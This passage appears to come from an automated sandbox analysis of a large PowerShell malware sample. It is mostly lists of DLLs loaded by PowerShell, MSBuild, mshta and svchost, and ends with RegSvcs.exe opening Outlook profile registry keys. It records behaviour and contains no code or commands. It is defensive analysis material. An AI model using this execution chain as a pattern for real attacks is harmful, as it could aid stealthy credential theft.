              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: msiso.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: srpapi.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: msimtf.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: resourcepolicyclient.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: textinputframework.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: coreuicomponents.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: dataexchange.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: dcomp.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: twinapi.appcore.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: jscript9.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: version.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: edputil.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: windows.staterepositoryps.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: appresolver.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: bcp47langs.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: slc.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: sppc.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: onecorecommonproxystub.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: onecoreuapcommonproxystub.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: ieframe.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: netapi32.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: wininet.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: mswsock.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: dxcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: msiso.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: srpapi.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: msiso.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: srpapi.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: msimtf.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: textinputframework.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: coreuicomponents.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: resourcepolicyclient.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: dataexchange.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: dcomp.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: twinapi.appcore.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: jscript9.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: version.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: edputil.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: windows.staterepositoryps.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: appresolver.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: bcp47langs.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: slc.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: sppc.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: onecorecommonproxystub.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: onecoreuapcommonproxystub.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: ieframe.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: netapi32.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: wininet.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: msiso.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: srpapi.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: msasn1.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
              Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
              Source: o3KyzpE7F4.ps1Static file information: File size 4056486 > 1048576
